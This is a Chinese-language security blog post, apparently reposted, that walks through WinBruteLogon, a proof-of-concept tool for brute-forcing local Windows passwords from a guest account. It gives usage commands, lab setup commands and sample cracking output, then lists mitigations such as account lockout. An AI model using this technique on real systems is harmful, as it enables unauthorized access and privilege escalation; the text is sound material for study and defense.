<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    神兵利器 - 在沒有任何權限的情況下破解任何 Microsoft Windows 用戶密碼

    VSole2022-04-21 10:42:52

    項目地址:https://github.com/DarkCoderSc/win-brute-logon

    目標:Windows XP 到最新的 Windows 10 版本 (1909)

    用法

    詞表文件

    WinBruteLogon.exe -u <username> -w <wordlist_file>
    

    標準輸入詞匯表

    type <wordlist_file> | WinBruteLogon.exe -u <username> -
    

    介紹

    這個 PoC 更像是我所說的 Microsoft Windows 身份驗證機制中的一個嚴重弱點,而不是一個漏洞。

    最大的問題與缺乏執行此類操作所需的權限有關。

    實際上,通過訪客帳戶(Microsoft Windows 上最受限制的帳戶),您可以破解任何可用本地用戶的密碼。

    使用命令找出哪些用戶存在:net user

    這個 PoC 使用多線程來加速進程并支持 32 位和 64 位。

    PoC 測試場景(使用訪客賬戶)

    在 Windows 10 上測試

    安裝和配置新更新的 Windows 10 虛擬機或物理機。

    在我的情況下,完整的 Windows 版本是:1909 (OS Build 18363.778)

    以管理員身份登錄并讓我們創建兩個不同的帳戶:一個管理員和一個普通用戶。兩個用戶都是本地用戶。

    /!\ 重要提示:我在演示中使用了 Guest 帳戶,但這個 PoC 不僅限于 Guest 帳戶,它適用于任何帳戶/組(guest 用戶/普通用戶/admin 用戶等...)

    創建一個新的管理員用戶

    net user darkcodersc /addnet user darkcodersc trousersnet localgroup administrators darkcodersc /add
    

    創建普通用戶

    net user HackMe /addnet user HackMe ozlq6qwm
    

    創建一個新的訪客帳戶

    net user GuestUser /addnet localgroup users GuestUser /deletenet localgroup guests GuestUser /add
    

    開始攻擊

    從管理員帳戶注銷或重新啟動計算機并登錄到訪客帳戶。

    將 PoC 可執行文件放在您作為訪客用戶可以訪問的任何地方。

    用法 :WinBruteLogon.exe -v -u -w

    -v是可選的,它設計了詳細模式。

    默認情況下,域名是%USERDOMAIN%env var 指定的值。您可以使用選項指定自定義名稱-d

    破解第一個用戶:(darkcodersc管理員)

    提示(客人)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

    等待幾秒鐘以查看以下結果:

    [ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=2260, handle=364[INFO] New "TWorker" Thread created with id=3712, handle=532[DONE] Done.[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06
    

    破解第二個用戶:(HackMe普通用戶)

    提示(客人)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

    等待幾秒鐘以查看以下結果:

    [ .. ] Load 10k-most-common.txt file in memory...[DONE] 10002 passwords successfully loaded.[INFO] 2 cores are available[ .. ] Create 2 threads...[INFO] New "TWorker" Thread created with id=5748, handle=336[INFO] New "TWorker" Thread created with id=4948, handle=140[DONE] Done.[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm][ .. ] Finalize and close worker threads...[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.[DONE] Done.[INFO] Ellapsed Time : 00:00:06
    

    如果您獲得了對低權限用戶的訪問權限,則可以破解更高權限用戶的密碼并提升您的權限。

    修復:

    • 禁用來賓帳戶(如果存在)。
    • 應用程序白名單。
    • 按照指南創建并保持密碼強度高。將此應用于所有用戶。

    實施安全鎖定策略(默認不存在)

    打開secpol.msc然后轉到Account Policies>并使用(1 到 999)之間的所需值Account Lockout Policy編輯值。Account lockout threshold

    值表示鎖定之前可能嘗試的次數。

    /!\ LockDown Policy 不適用于管理員帳戶。此時,對管理員帳戶(如果啟用)的最佳保護是設置一個非常復雜的密碼。

    info
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    我們針對容器化微服務的層結構特征,設計了基礎層共享的部署算法,降低微服務下載通信量并增加微服務部署密度,提升邊緣吞吐量。
    WithSecure Intelligence 表示,Ducktail 惡意軟件試圖劫持使用 Facebook 商業和廣告平臺的個人的賬戶。
    介紹一個好用的web信息收集工具 其功能包括: 子域名收集 多線程子域名爆破 指紋信息收集 備案信息收集 批量子域名收集和批量子域名爆破 是一款挖掘SRC的實用小工具
    攻擊者正在使用技術來更改URL,并將受害者發送到流氓和潛在的惡意域。這可以包括百分比編碼,并且URL可以指向其他地方。網絡釣魚中的一些常見策略包括:偽造的文件附件實際上是一個包含URL的圖像,以及您認為您將要訪問一個站點的開放重定向URL攻擊,“這可能是一系列重定向鏈,非常可怕。”如果確實需要打開URL,Malik建議在安全的虛擬機中打開URL,或將其交給法醫專家,后者將擁有合適的設備和工具。
    互聯網基礎設施是上層網絡應用蓬勃發展的重要基石。近年來,隨著地緣沖突的加劇,互聯網的互聯互通特性正面臨著前所未有的嚴峻挑戰,互聯網基礎設施的安全性成為備受關注的話題。
    7月27日上午,網絡安全研究國際學術論壇(InForSec)將于北京網絡安全大會(BCS)“學術日”舉辦題為“軟件供應鏈安全”的學術交流會。 會議由清華大學(網絡研究院)-奇安信聯合研究中心研究員應凌云主持,會上將有來自復旦大學、清華大學(網絡研究院)-奇安信聯合研究中心、浙江大學、螞蟻集團、香港中文大學的學者們分享研究過程中的靈感、經驗和體會。
    0x02.訪問80端口:一個很經典的WordPress頁面當然最重要的信息是only?這里有兩種可能:1.指wordpress后臺賬戶只有oscp,2.是這臺靶機系統上只有ROOT和OSCP這兩個用戶。
    工具介紹為了方便安全從業人員在使用網絡測繪平臺進行信息搜集時的效率,本程序集合了多個網絡測繪平臺,可以快速在多個網絡測繪平臺搜索信息并且合并展示及導出。?
    在SQL注入中它的作用是什么,那么有沒有可以替代這個庫的方法呢。
    Facebook 的商業和廣告賬戶正處于正在進行的名為Ducktail的活動的接收端,該活動旨在作為財務驅動的網絡犯罪活動的一部分奪取控制權。 芬蘭網絡安全公司 WithSecure(前身為 F-Secure Business)在一份新報告中表示: “威脅行為者的目標是可能使用信息竊取惡意軟件訪問 Facebook Business 帳戶的個人和員工。”
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类